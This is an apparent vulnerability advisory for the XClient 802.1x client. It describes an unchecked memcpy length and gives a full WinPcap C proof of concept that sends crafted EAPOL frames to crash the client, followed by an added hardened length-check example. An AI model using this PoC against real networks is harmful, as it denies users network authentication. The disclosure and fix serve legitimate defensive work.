XClient 802.1x client 2.0 is an H3C 802.1x protocol authentication client commonly used in universities. Because the software does not validate the length field of a received data packet, a buffer overflow occurs and a denial-of-service vulnerability results. The program extracts the 17th byte of the received data, sign-extends it, subtracts 4, and passes the result directly to memcpy as the length. If the 17th byte is any value between 0 and 3, the length argument to memcpy becomes very large, resulting in a buffer overflow.

Vulnerability proof: the PoC code is as follows:

```c
#include "stdafx.h"
#include <string.h>   // memset
#include <windows.h>  // Sleep
#include <pcap.h>
#pragma comment(lib, "wpcap.lib")

int _tmain(int argc, _TCHAR *argv[])
{
    pcap_t *fp;
    char errbuf[PCAP_ERRBUF_SIZE];
    u_char packet[1000];
    pcap_if_t *alldevs;

    /* Check the validity of the command line */
    if (pcap_findalldevs(&alldevs, errbuf) == -1) {
        fprintf(stderr, "Error in pcap_findalldevs: %s\n", errbuf);
        exit(1);
    }

    pcap_if_t *d;
    int i = 0;
    /* Print the list */
    for (d = alldevs; d; d = d->next) {
        printf("%d. %s", ++i, d->name);
        if (d->description)
            printf(" (%s)\n", d->description);
        else
            printf(" (No description available)\n");
    }

    /* Select the corresponding NIC */
    if ((fp = pcap_open_live(alldevs->name,  // name of the device
                             65536,          // portion of the packet to capture; it doesn't matter in this case
                             1,              // promiscuous mode (nonzero means promiscuous)
                             1000,           // read timeout
                             errbuf          // error buffer
                             )) == NULL) {
        fprintf(stderr, "\nUnable to open the adapter. %s is not supported by WinPcap\n", argv[1]);
        return 2;
    }

    memset(packet, 0, 1000);
    /* target machine MAC address */
    packet[0] = 0x00; packet[1] = 0x0C; packet[2] = 0x29;
    packet[3] = 0x0F; packet[4] = 0x63; packet[5] = 0xDD;
    /* set MAC source to 2:2:2:2:2:2 */
    packet[6] = 2; packet[7] = 2; packet[8]  = 2;
    packet[9] = 2; packet[10] = 2; packet[11] = 2;
    /* protocol header */
    packet[12] = 0x88;
    packet[13] = 0x8e;
    packet[14] = 0x01;
    packet[15] = 0x01;
    packet[0x12] = 0x0A;   // It must be 0x0A
    packet[23] = '#' + 1;  // This is not equal to '#'
    packet[17] = 0;        // length information

    /* Send down the packet */
    if (pcap_sendpacket(fp,      // adapter
                        packet,  // buffer with the packet
                        1000     // size
                        ) != 0) {
        fprintf(stderr, "\nError sending the packet: %s\n", pcap_geterr(fp));
        return 3;
    }
    Sleep(100);
    if (pcap_sendpacket(fp, packet, 1000) != 0) {
        fprintf(stderr, "\nError sending the packet: %s\n", pcap_geterr(fp));
        return 3;
    }
    pcap_close(fp);
    return 0;
}
```

Attack process: start XClient, enter the user information, click Start authentication, and then run the attack code. Then, the program exits.

Solution: add length verification to filter invalid data.
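The following is an added example, not code from the advisory or from the XClient software, showing what the proposed fix looks like next to the computation the advisory describes. It reads the length byte at offset 17 and subtracts 4, as the page states; the destination buffer size (256 bytes), the frame size (64 bytes) and the assumption that the copied payload starts right after the length byte are constructed for the example, not taken from the client.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define LEN_OFFSET  17   /* offset of the length byte, as set by the advisory's PoC */
#define MAX_PAYLOAD 256  /* destination buffer size: constructed for this example */

/* The computation the advisory describes: sign-extend the byte, subtract 4,
 * hand the result to memcpy. Any byte in 0..3 (and anything >= 0x80, which
 * sign-extends negative) wraps to a huge size_t. */
static size_t unchecked_length(const uint8_t *frame)
{
    int len = (int)(int8_t)frame[LEN_OFFSET];  /* signed extension */
    len -= 4;
    return (size_t)len;                        /* negative becomes enormous */
}

/* Hardened version: the length is read unsigned, must be at least the 4-byte
 * overhead, must fit the destination, and must not run past the frame.
 * Returns 0 on success (copied length in *out_len), -1 if the frame is rejected. */
int checked_copy(uint8_t *dst, size_t dst_size,
                 const uint8_t *frame, size_t frame_len, size_t *out_len)
{
    if (frame_len <= LEN_OFFSET)
        return -1;                              /* length byte not even present */
    unsigned len = frame[LEN_OFFSET];           /* unsigned: no sign extension */
    if (len < 4)
        return -1;                              /* the 0..3 case the PoC sends */
    len -= 4;
    if (len > dst_size)
        return -1;                              /* would overflow the destination */
    if (LEN_OFFSET + 1 + (size_t)len > frame_len)
        return -1;                              /* would read past the frame */
    memcpy(dst, frame + LEN_OFFSET + 1, len);   /* payload assumed to follow the length byte */
    *out_len = len;
    return 0;
}

/* Constructed sample frame, not captured traffic. */
static uint8_t g_frame[64];

static void build_frame(uint8_t len_byte)
{
    memset(g_frame, 0, sizeof g_frame);
    g_frame[12] = 0x88;                         /* EAPOL ethertype, as in the advisory */
    g_frame[13] = 0x8e;
    g_frame[LEN_OFFSET] = len_byte;
}

/* 1 if the unchecked computation would exceed a MAX_PAYLOAD buffer, else 0. */
int unchecked_overflows(uint8_t len_byte)
{
    build_frame(len_byte);
    return unchecked_length(g_frame) > (size_t)MAX_PAYLOAD;
}

/* Result of the hardened path for a frame with the given length byte:
 * -1 if rejected, otherwise the number of bytes copied. */
long checked_result(uint8_t len_byte)
{
    uint8_t dst[MAX_PAYLOAD];
    size_t copied = 0;
    build_frame(len_byte);
    if (checked_copy(dst, sizeof dst, g_frame, sizeof g_frame, &copied) != 0)
        return -1;
    return (long)copied;
}
```

Running the two paths over the same frames shows the difference: a length byte of 0 through 3 (or 0xFF, which sign-extends to -1) turns into a multi-gigabyte memcpy in the unchecked version, while the hardened version rejects those frames and also refuses a length that would read beyond the 64-byte frame.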